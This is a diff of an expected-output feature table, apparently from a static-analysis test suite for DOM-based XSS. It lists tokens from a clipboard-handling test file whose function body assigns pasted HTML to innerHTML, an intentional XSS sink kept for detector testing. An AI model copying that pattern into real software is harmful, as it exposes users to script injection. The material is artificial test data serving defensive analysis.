getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:49:65:54 | length | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:49:65:54 | length | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:49:65:54 | length | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:49:65:54 | length | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:57 | i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:57 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:57 | i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:57 | i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:57 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i++ | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i++ | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i++ | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i++ | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:65:57:65:59 | i++ | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:18 | file | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:18 | file | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:18 | file | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:18 | file | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:18 | file | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:45 | file = ... iles[i] | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:45 | file = ... iles[i] | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:45 | file = ... iles[i] | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:45 | file = ... iles[i] | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:15:66:45 | file = ... iles[i] | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:22 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:22 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:22 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:22 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:22 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:36 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:36 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:36 | e.clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:36 | e.clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:36 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:42 | e.clipb ... a.files | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:42 | e.clipb ... a.files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:42 | e.clipb ... a.files | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:42 | e.clipb ... a.files | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:42 | e.clipb ... a.files | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:45 | e.clipb ... iles[i] | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:45 | e.clipb ... iles[i] | contextSurroundingFunctionParameters | (e) | | autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:45 | e.clipb ... iles[i] | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:45 | e.clipb ... iles[i] | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:66:22:66:45 | e.clipb ... iles[i] | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:24:66:36 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:24:66:36 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:24:66:36 | clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:24:66:36 | clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:24:66:36 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:38:66:42 | files | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:38:66:42 | files | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:38:66:42 | files | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:38:66:42 | files | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:38:66:42 | files | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:44:66:44 | i | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:44:66:44 | i | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:44:66:44 | i | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:44:66:44 | i | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:66:44:66:44 | i | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:9 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:9 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:9 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:9 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:9 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:23 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:23 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:23 | e.clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:23 | e.clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:23 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:29 | e.clipb ... a.types | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:29 | e.clipb ... a.types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:29 | e.clipb ... a.types | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:29 | e.clipb ... a.types | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:29 | e.clipb ... a.types | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:38 | e.clipb ... ncludes | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:38 | e.clipb ... ncludes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:38 | e.clipb ... ncludes | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:38 | e.clipb ... ncludes | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:38 | e.clipb ... ncludes | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | e.clipb ... /html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | e.clipb ... /html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | e.clipb ... /html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | exceptional return of e.clipb ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | exceptional return of e.clipb ... /html') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | exceptional return of e.clipb ... /html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | exceptional return of e.clipb ... /html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:9:70:51 | exceptional return of e.clipb ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:11:70:23 | clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:11:70:23 | clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:11:70:23 | clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:11:70:23 | clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:11:70:23 | clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:25:70:29 | types | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:25:70:29 | types | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:25:70:29 | types | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:25:70:29 | types | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:25:70:29 | types | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:31:70:38 | includes | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:31:70:38 | includes | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:31:70:38 | includes | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:31:70:38 | includes | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:70:31:70:38 | includes | fileImports | | | autogenerated/Xss/DomBasedXss/clipboard.ts:70:40:70:50 | 'text/html' | CalleeFlexibleAccessPath | e.clipboardData.types.includes | | autogenerated/Xss/DomBasedXss/clipboard.ts:70:40:70:50 | 'text/html' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/clipboard.ts:70:40:70:50 | 'text/html' | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | @@ -12597,6 +94644,56 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/clipboard.ts:70:40:70:50 | 'text/html' | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | | autogenerated/Xss/DomBasedXss/clipboard.ts:70:40:70:50 | 'text/html' | enclosingFunctionName | getClipboardData | | autogenerated/Xss/DomBasedXss/clipboard.ts:70:40:70:50 | 'text/html' | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:23 | droppedHtml | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:23 | droppedHtml | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:23 | droppedHtml | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:23 | droppedHtml | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:23 | droppedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | dropped ... /html') | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | dropped ... /html') | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | dropped ... /html') | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | dropped ... /html') | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | dropped ... /html') | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | droppedHtml | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | droppedHtml | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | droppedHtml | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | droppedHtml | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:13:71:62 | droppedHtml | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:27 | e | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:27 | e | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:27 | e | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:27 | e | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:27 | e | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:41 | e.clipboardData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:41 | e.clipboardData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:41 | e.clipboardData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 src imgs 0 0 src dropItems add src e clipboardData types includes text/plain plainText e clipboardData getData text/plain /^https?:\\/\\//i test plainText dropItems add plainText imageItems Array from dropItems imageItems | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:41 | e.clipboardData | enclosingFunctionName | getClipboardData | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:41 | e.clipboardData | fileImports | | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:49 | e.clipb ... getData | contextFunctionInterfaces | getClipboardData(e)\ninstall(el)\nonpaste(e)\npaste(e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:49 | e.clipb ... getData | contextSurroundingFunctionParameters | (e) | +| autogenerated/Xss/DomBasedXss/clipboard.ts:71:27:71:49 | e.clipb ... getData | enclosingFunctionBody | e ClipboardEvent Promise Array File dropItems Set File e clipboardData files length 0 i 0 i e clipboardData files length i file e clipboardData files i e clipboardData types includes text/html droppedHtml e clipboardData getData text/html container document createElement html container innerHTML droppedHtml imgs container getElementsByTagName img imgs length 1 